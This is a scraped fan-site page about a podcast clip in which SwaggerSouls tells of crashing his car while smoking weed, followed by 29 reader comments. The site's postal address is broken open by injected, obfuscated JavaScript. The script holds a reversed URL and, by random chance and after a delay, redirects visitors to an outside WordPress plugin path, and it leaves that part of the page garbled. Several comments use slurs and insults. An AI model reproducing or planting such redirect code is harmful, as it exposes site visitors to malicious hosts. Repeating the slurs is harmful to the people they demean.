SwaggerSouls Crashed His Car While Smoking Weed

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▸ Fitz:
▸ SwaggerSouls:
▸ Toby:

P.O. Box 2041
Brunswick East 3057
Victoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria, Australia


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31 thoughts on “SwaggerSouls Crashed His Car While Smoking Weed”

  1. 5ive 10en says:

    Please stop posting clips of this trash episode, I hated this so much

  2. Hector Pena says:

    I drive so good while high….so relaxed yet super aware

  3. F1 ShAdO says:

    The whole story was a shitty pun

  4. nihga says:

    dafuq is this fake shit

  5. JCN says:

    Thats a mustang for all of you out there. Guys the misfits is now faking content.

  6. Jon Barnes says:

    Hey guys Swagger played Fallout New Vegas so he would know if you dont know look it up Swagger sounds almost exactly like the book chute in the Old World Blues DLC in Fallout New Vegas

  7. AscendedNebula says:

    I can see a cough but let’s be honest swaggers not gonna drop the joint lmao

  8. -KIMG- says:

    the guy in the chain mail has the most annoying voice ever holy lord

  9. juiceisforkids says:

    That's what you get for smoking and driving, what an idiot.

  10. The Titan says:

    We not gonna talk about the Thomas the train bong in the back

  11. peepeescreem says:

    This clickbait fake story shit is getting really fucking dumb. Like holy shit. You guys just say anything for views and upload it.

  12. killzone3234 says:

    why does he sound like Howard Stern?

  13. Witcher Astartes says:

    I'm disappointed… But I'm not surprised.

  14. Jeff Amsdell says:

    Fake stories are fucking stupid

  15. matt yung says:

    This idiot should have his license taken away

  16. Winter says:

    im happy thet SwaggerSouls is ok

  17. Selly says:

    Lmao that mad me so mad I wasted 2 mins of my life listening to swagger explaining how his fucken Mercedes Benz

  18. ItsWilbur says:

    It hurts my head how people don't realize that these are improv stories.

  19. Josh Didgit says:

    What an idiot, only retarded people crash there car while smoking weed, I cough profusely and would never have this happen because you just need to not be stupid. If this is a real story and not a fake one like they always tell on their podcast then swagger is more dumb than I thought.

  20. Da vid says:

    Zuckles is my favorite weetard ❤️

  21. james TtT says:

    Swagger " smoking my joint in my Mercedes " souls

  22. Don’t Test It. says:

    Now swagger has a DUI lol

  23. Onkelawesome RULLESTAD says:

    Its a mustang in the photo

  24. Randy says:

    What a stupid piece of shit. Fuck him.. it's just like drinking and driving.

  25. goddman1127 says:

    Maybe don't smoke and drive you dumbass your lucky your alive or didn't kill someone else you goon.

  26. Jose Rios says:

    The Mercedes busted a Paul walker

  27. Zorn tier says:

    I know this is fake because swagger cant reach the paddles

  28. Guy Why says:

    Why the fuck was he still speeding?

  29. Hauxie says:

    been there but it was my phone that slipped from the center console and i smoked a 2018 ram 2500. thank god no owi. (i’ve learned from mistakes)

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